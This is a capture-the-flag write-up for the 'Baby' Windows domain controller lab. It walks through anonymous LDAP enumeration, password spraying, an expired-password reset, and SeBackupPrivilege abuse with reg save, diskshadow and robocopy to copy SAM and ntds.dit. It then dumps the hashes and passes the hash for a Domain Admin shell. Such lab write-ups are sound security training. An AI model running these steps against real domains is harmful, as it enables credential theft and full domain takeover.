Overview

Baby is an easy windows machine from VL created by xct that starts off with anonymous LDAP access which can be used to get credentials for a domain user. The password for the domain user must be changed so I’ll change the password using impacket’s smbpasswd.py. I can then get a shell over WinRM with the newly set password for the user flag. For root I’ll abuse the SeBackupPrivilege to backup the sam & system files, and I’ll run those through pypykatz to dump all of the NTLM hashes on the domain. I can grab the Administrator’s NT hash and I try using it over WinRM but it fails because this is the hash for the local Administrator. I’ll grab the ntds.dit file, and I’ll run it through impacket-secretsdump, along with the sam & system. This time I can get a shell through WinRM as the Domain Admin for the root flag.

Nmap Scan

I’ll start by running nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
獣 ~/vl/Baby/scans/tcp ➜ nmap -sCV --top-ports 10000 -T4 -vvvv 10.10.78.209 -oA baby
Nmap scan report for 10.10.78.209
Host is up, received echo-reply ttl 127 (0.17s latency).
Scanned at 2024-10-30 01:58:02 EDT for 95s
Not shown: 8355 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-10-30 05:58:40Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3269/tcp open  tcpwrapped    syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: BABY
|   NetBIOS_Domain_Name: BABY
|   NetBIOS_Computer_Name: BABYDC
|   DNS_Domain_Name: baby.vl
|   DNS_Computer_Name: BabyDC.baby.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-10-30T05:58:52+00:00
|_ssl-date: 2024-10-30T05:59:31+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-26T09:03:15
| Not valid after:  2025-01-25T09:03:15
| MD5:   a63f:e0e6:9c19:ba19:0f14:2198:bd20:3eb3
| SHA-1: 79c6:f752:73d0:6818:241e:6087:88b0:2a7f:b0bf:ec7f
| -----BEGIN CERTIFICATE-----
| MIIC4DCCAcigAwIBAgIQFwL4czAa9aBN7bpDVkexjDANBgkqhkiG9w0BAQsFADAZ
| MRcwFQYDVQQDEw5CYWJ5REMuYmFieS52bDAeFw0yNDA3MjYwOTAzMTVaFw0yNTAx
| MjUwOTAzMTVaMBkxFzAVBgNVBAMTDkJhYnlEQy5iYWJ5LnZsMIIBIjANBgkqhkiG
| 9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvntpU8oF4UIGBqJLsq7P1c3QjdjDakJb/qiQ
| oz9U+2z64TtePs20cvML7dm21cx/isH8XFlG23r1MhNl2C21Xd/gnET7piCETolV
| s+Z05Cvpm/l3TCVrg8MVxSQF8GuwxOoLI13aZ822/xiTyhsIEMH6G7hc+g3lbePr
| QKBTxcSjoohTXur97lveMYSWrBo1aLkJUYYFyhUipv637S9NAS2nF2UVIeZQbqDi
| XEy2dxNoTX0HSxfLcyNeXsvrdoh2EFPb5nAPD81Ogjrpix34hDS2Q/OTNL8hiIiI
| MpfE0JP06SCqaxkIs8X86/6vpgbh41dz659cSbL6hTyfAQPYVQIDAQABoyQwIjAT
| BgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQAD
| ggEBADiIqN/vl7WhXDBvKxZpwTYdO/0Jovvp6BeucDMtCY7bj4BwifTzK2uBcGrd
| KmxOFqOub6j6wrISXTDBdU3qOLSndNyDLSihg69sMmW2toXGtgEr4VEJdl3aMflA
| fsk8bxr/qLWXSjffR+qkrEEjnxqaTb365SRYrBGPM++2yh/yz8ZHtm0catlDxG8I
| VNHzYX6m5B3VJC+lHhAdeUXDhyVvWlBbf5tHKKhY+QU4dijhMA4puS0V15dFfWDJ
| cg/QS0HaroEBpvm/Z1tz4ID1TOj5Wbuo4kz7zBnnAsphno/VRrG8bTf+niSiAbvg
| wrHcuksgbJuSK/OeFaovZ08SO9c=
|_-----END CERTIFICATE-----
5357/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 16177/tcp): CLEAN (Timeout)
|   Check 2 (port 12240/tcp): CLEAN (Timeout)
|   Check 3 (port 63385/udp): CLEAN (Timeout)
|   Check 4 (port 33075/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time:
|   date: 2024-10-30T05:58:53
|_  start_date: N/A

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 30 01:59:37 2024 -- 1 IP address (1 host up) scanned in 95.49 seconds

All of these ports are usually default ports that are open on a DC (Domain Controller). I’ll start by checking Guest authentication in SMB, and anonymous access over LDAP and RPC.

Recon

445 - SMB

I’ll use nxc to check for Guest authentication in SMB:

1
2
3
獣 ~/vl/Baby/enumeration ➜ nxc smb 10.10.78.209 -u Guest -p '' --shares
SMB         10.10.78.209    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.78.209    445    BABYDC           [-] baby.vl\Guest: STATUS_ACCOUNT_DISABLED

The Guest account is disabled so SMB isn’t a target currently.

135 - RPC

I’ll check for anonymous access via rpcclient:

1
2
3
獣 ~/vl/Baby/enumeration ➜ rpcclient -U "" 10.10.78.209
Password for [WORKGROUP\]:
Cannot connect to server.  Error was NT_STATUS_LOGON_FAILURE

I get a logon failure error, so anonymous access for RPC is disabled.

389 - LDAP

I can see the FQDN from the nxc output, so I’ll add those contents to my /etc/hosts file:

1
10.10.78.209	BABYDC.baby.vl baby.vl

To test anonymous access, I’ll use ldapsearch to dump all of the information:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
獣 ~/vl/Baby/enumeration ➜ ldapsearch -H ldap://BABYDC.baby.vl -x -b "DC=baby,DC=vl"
# extended LDIF
#
# LDAPv3
# base <DC=baby,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# baby.vl
dn: DC=baby,DC=vl

# Administrator, Users, baby.vl
dn: CN=Administrator,CN=Users,DC=baby,DC=vl

...snip...

This was successful, so I’ll start by enumerating LDAP.

Shell as caroline.robinson

Finding The Password

I’ll run the ldapsearch command again, and this time I’ll save the output into a file named ldap-anonymous:

1
2
3
獣 ~/vl/Baby/enumeration ➜ ldapsearch -H ldap://BABYDC.baby.vl -x -b "DC=baby,DC=vl" > ldap-anonymous
獣 ~/vl/Baby/enumeration ➜ ls
ldap-anonymous

Next I’ll search for distinguishedName, which gives me a list of every user and group:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
獣 ~/vl/Baby/enumeration ➜ cat ldap-anonymous | grep 'distinguishedName'
distinguishedName: CN=Guest,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Computers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Users,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Guests,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,
distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby
distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Protected Users,CN=Users,DC=baby,DC=vl
distinguishedName: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
distinguishedName: CN=dev,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Hugh George,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
distinguishedName: CN=it,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
distinguishedName: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
distinguishedName: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
distinguishedName: CN=Caroline Robinson,OU=it,DC=baby,DC=vl

One common thing that I see when I have anonymous LDAP access, is sensitive information in the description of an group/user, so I’ll search for description:

1
2
3
4
5
6
7
8
獣 ~/vl/Baby/enumeration ➜ cat ldap-anonymous | grep 'description' -A2
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=Guest,CN=Users,DC=baby,DC=vl
instanceType: 4
...snip...
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl

I can see that the description for the Teresa user contains some juicy info:

1
Set initial password to BabyStart123!

Based off of the description, I’ll guess that the password I found is the Teresa user’s default password.

Testing The Creds

I’ll test the creds I found on the Teresa user. To do this I need the users actual username, I’ll get all of the usernames via ldapsearch and I’ll output them to a file named users.txt: 

1
2
3
4
5
6
7
8
9
10
11
獣 ~/vl/Baby/enumeration ➜ cat ldap-anonymous | grep 'userPrincipalName' | awk -F 'userPrincipalName: |@' '{print $2}'
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
獣 ~/vl/Baby/enumeration ➜ cat ldap-anonymous | grep 'userPrincipalName' | awk -F 'userPrincipalName: |@' '{print $2}' > users.txt

The username I am looking for is Teresa.Bell, I’ll try to authenticate to SMB using the password I found from LDAP:

1
2
3
獣 ~/vl/Baby/enumeration ➜ nxc smb BABYDC.baby.vl -u Teresa.Bell -p 'BabyStart123!' --shares
SMB         10.10.78.209    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.78.209    445    BABYDC           [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE

I get a logon failure error, this means that this user’s password has probably been changed to a different password. Seeing as the password was set as the intial password, it might be the default password used across the domain. I’ll use kerbrute to see if I can find any other user that haven’t changed their password yet.

Spraying The Creds

I’ll run kerbrute with the users.txt file and the password that I wanna spray:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
獣 ~/vl/Baby/enumeration ➜ kerbrute passwordspray --dc BABYDC.baby.vl -d baby.vl users.txt 'BabyStart123!'

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 10/30/24 - Ronnie Flathers @ropnop

2024/10/30 02:21:16 >  Using KDC(s):
2024/10/30 02:21:16 >  	BABYDC.baby.vl:88

2024/10/30 02:21:16 >  [+] VALID LOGIN:	 Caroline.Robinson@baby.vl:BabyStart123!
2024/10/30 02:21:16 >  Done! Tested 9 logins (1 successes) in 0.366 seconds

Changing The Users Password

I get one valid login, I’ll test the authentication over SMB via nxc:

1
2
3
獣 ~/vl/Baby/enumeration ➜ nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!' --shares
SMB         10.10.78.209    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.78.209    445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

The error I recieved tells me that this users password was infact the default password used across the domain. The reason the authentication didn’t work is because this users password expired because they haven’t changed it yet. I can take advantage of this using impacket’s smbpasswd.py to change the users password:

1
2
3
4
5
6
7
8
9
獣 ~/vl/Baby/enumeration ➜ smbpasswd.py baby.vl/'Caroline.Robinson':'BabyStart123!'@BABYDC.baby.vl -newpass 'S3cur3P4ssw0rd!'
Impacket v0.12.0.dev1+20240509.95404.2a65d8d9 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version
===============================================================================

[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

The password was changed successfully to S3cur3P4ssw0rd!.

Shell as Caroline.Robinson

I’ll try to authenticate to SMB with the new password that I set:

1
2
3
4
5
6
7
8
9
10
11
獣 ~/vl/Baby/enumeration ➜ nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'S3cur3P4ssw0rd!' --shares
SMB         10.10.78.209    445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.10.78.209    445    BABYDC           [+] baby.vl\Caroline.Robinson:S3cur3P4ssw0rd!
SMB         10.10.78.209    445    BABYDC           [*] Enumerated shares
SMB         10.10.78.209    445    BABYDC           Share           Permissions     Remark
SMB         10.10.78.209    445    BABYDC           -----           -----------     ------
SMB         10.10.78.209    445    BABYDC           ADMIN$          READ            Remote Admin
SMB         10.10.78.209    445    BABYDC           C$              READ,WRITE      Default share
SMB         10.10.78.209    445    BABYDC           IPC$            READ            Remote IPC
SMB         10.10.78.209    445    BABYDC           NETLOGON        READ            Logon server share
SMB         10.10.78.209    445    BABYDC           SYSVOL          READ            Logon server share

The authentication worked, but all of the shares are default. I’ll check if I have access to WinRM:

1
2
3
獣 ~/vl/Baby/enumeration ➜ nxc winrm BABYDC.baby.vl -u Caroline.Robinson -p 'S3cur3P4ssw0rd!'
WINRM       10.10.78.209    5985   BABYDC           [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM       10.10.78.209    5985   BABYDC           [+] baby.vl\Caroline.Robinson:S3cur3P4ssw0rd! (Pwn3d!)

I do have WinRM access, so I’ll use evil-winrm for a shell:

1
2
3
4
5
6
7
8
9
10
獣 ~/vl/Baby/enumeration ➜ evil-winrm -i BABYDC.baby.vl -u Caroline.Robinson -p 'S3cur3P4ssw0rd!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents>

I got a shell, and with that I can read the user flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> ls


    Directory: C:\Users\Caroline.Robinson\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         6/21/2016   3:36 PM            527 EC2 Feedback.website
-a----         6/21/2016   3:36 PM            554 EC2 Microsoft Windows Guide.website
-a----        11/21/2021   3:24 PM             36 user.txt


*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> cat user.txt
VL{<redacted>}

Shell as Administrator

Getting The sam & system

I’ll start by running whoami /all to see my user privileges and groups:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /all

USER INFORMATION
----------------

User Name              SID
====================== ==============================================
baby\caroline.robinson S-1-5-21-1407081343-4001094062-1444647654-1115


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
BABY\it                                    Group            S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

I have SeBackupPrivilege and I’m in the BUILTIN\Backup Operators group. This allows me to basically read any file that I want. I’ll backup the sam & system, which I can then use to dump all of the NTLM hashes locally via pypykatz. I’ll start by getting the sam & system:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> mkdir C:\temp


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        10/30/2024   6:37 AM                temp


*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save hklm\sam c:\Temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save hklm\system c:\Temp\system

The operation completed successfully.

Nice, now I’ll download both of these files using the download feature in evil-winrm:

1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> cd C:\temp
*Evil-WinRM* PS C:\temp> download sam

Info: Downloading C:\temp\sam to sam

Info: Download successful!
*Evil-WinRM* PS C:\temp> download system

Info: Downloading C:\temp\system to system

Info: Download successful!

Dumping Hashes via pypykatz

I can use pypykatz to dump the hashes from those two files:

1
2
獣 ~/vl/Baby/enumeration ➜ pypykatz registry --sam sam system
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::

Shell over WinRM (Fail)

Now I’ll try to connect over WinRM:

1
2
3
4
5
6
7
8
9
10
11
12
13
獣 ~/vl/Baby/enumeration ➜ evil-winrm -i BABYDC.baby.vl -u Administrator -H '8d992faed38128ae85e95fa35868bb43'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

The authentication failed, but why? The reason the NT hash failed was because this is the hash for the local Administrator, not the Domain Admin. I just need to grab the ntds.dit file aswell, and then I can use all three of the files with impacket-secretsdump to get the actual Domain Admin’s NT hash.

Using impacket-secretsdump

To do this I’ll use this script with diskshadow:

1
2
3
4
5
6
7
8
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

I’ll put this script in a file named script.txt and I’ll upload it to the machine using the upload feature in evil-winrm:

1
2
3
4
5
6
7
*Evil-WinRM* PS C:\temp> upload script.txt

Info: Uploading /root/vl/Baby/enumeration/script.txt to C:\temp\script.txt

Data: 232 bytes of 232 bytes copied

Info: Upload successful!

Now I’ll run diskshadow:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\temp> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  BABYDC,  10/30/2024 6:54:55 AM

-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
...snip...
The shadow copy was successfully exposed as E:\.
-> end backup

And now I can copy the ntds.dit to C:\temp via robocopy:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
*Evil-WinRM* PS C:\temp> robocopy /b E:\Windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Wednesday, October 30, 2024 6:56:53 AM
   Source : E:\Windows\ntds\
     Dest : C:\temp\

    Files : ntds.dit

...snip...

   Speed :           76,608,292 Bytes/sec.
   Speed :            4,383.562 MegaBytes/min.
   Ended : Wednesday, October 30, 2024 6:56:53 AM

*Evil-WinRM* PS C:\temp> ls


    Directory: C:\temp


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   6:55 AM       16777216 ntds.dit
-a----        10/30/2024   6:37 AM          49152 sam
-a----        10/30/2024   6:54 AM            175 script.txt
-a----        10/30/2024   6:37 AM       16654336 system

Now I’ll download ntds.dit and I’ll run all three files through impacket-secretsdump:

1
2
3
4
5
6
獣 ~/vl/Baby/enumeration ➜ impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<redacted>:::

Shell as Administrator (success)

I’ll try to get a shell over WinRM with the new hash:

1
2
3
4
5
6
7
8
9
10
獣 ~/vl/Baby/enumeration ➜ evil-winrm -i BABYDC.baby.vl -u Administrator -H '<redacted>'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

This worked, and with that I can read the root flag:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        11/21/2021   3:22 PM             36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
VL{<redacted>}

Thoughts

Baby was a pretty good machine, anonymous LDAP access is something I don’t usually see too often so it was nice to get a refresher. I’ve also never known that just using the sam & system doesn’t always work, so this was new for me and I learned a lot.